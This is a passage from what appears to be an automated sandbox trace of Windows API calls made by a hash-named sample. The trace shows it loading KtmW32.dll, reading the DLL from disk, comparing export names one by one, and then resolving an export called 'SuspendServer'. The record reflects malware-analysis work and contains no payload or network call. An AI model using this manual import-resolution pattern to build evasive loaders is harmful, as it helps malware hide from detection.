lpString2="AnimateWindow") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0140.594] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0141.404] GetProcessHeap () returned 0x530000 [0141.404] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x4118040 | out: hHeap=0x530000) returned 1 [0141.411] GetProcessHeap () returned 0x530000 [0141.411] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x549380 [0141.411] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0141.414] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0141.414] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0141.414] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0141.414] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0141.414] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0141.414] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0141.414] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0141.415] GetProcessHeap () returned 0x530000 [0141.415] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x5e00) returned 0x2d55030 [0141.415] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0141.415] ReadFile (in: hFile=0x17c, lpBuffer=0x2d55030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d55030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0141.415] CloseHandle (hObject=0x17c) returned 1 [0141.415] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0141.416] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0141.416] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0141.416] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0141.416] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0141.416] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0141.416] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0141.416] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0141.416] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0141.416] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0141.416] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0141.416] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0141.416] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0141.416] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0141.416] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0141.416] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0141.416] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0141.416] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0141.416] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0141.416] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0141.416] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0141.416] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0141.416] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0141.416] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0141.416] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0141.416] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0141.416] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0141.416] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0141.416] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0141.416] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0141.416] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0141.416] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0141.416] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0141.416] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0141.417] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0141.417] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0141.417] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0141.417] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0141.417] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0141.417] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0141.417] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0141.417] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0141.417] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0141.417] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0141.417] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0141.417] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0141.417] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0141.417] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0141.417] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0141.418] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0141.418] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0141.418] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0141.418] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0141.418] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0141.418] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0141.418] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0141.418] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0141.418] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0141.418] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.419] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0141.420] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.420] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0141.420] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0141.420] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0141.420] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0141.420] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.421] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0141.421] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0141.421] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0141.421] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0141.421] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0141.421] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0141.421] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0141.422] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0141.423] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0141.423] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0141.423] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0141.424] GetProcessHeap () returned 0x530000 [0141.424] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2d55030 | out: hHeap=0x530000) returned 1 [0141.608] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0141.608] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0141.608] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1000) returned 0x2d55030 [0141.610] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1c) returned 0x5385e0 [0141.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SuspendServer", cchWideChar=-1, lpMultiByteStr=0x5385e0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SuspendServer", lpUsedDefaultChar=0x0) returned 14 [0141.610] GetLastError () returned 0x0 [0141.610] SetLastError (dwErrCode=0x0) [0141.610] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="SuspendServerW") returned 0x0 [0141.610] GetLastError () returned 0x7f [0141.610] SetLastError (dwErrCode=0x7f) [0141.610] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="SuspendServerA") returned 0x0 [0141.610] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="SuspendServer") returned 0x7ffc45e91550 [0141.611] GetActiveWindow () returned 0x0 [0141.621] GetProcAddress (hModule=0x7ffc5ecd0000, 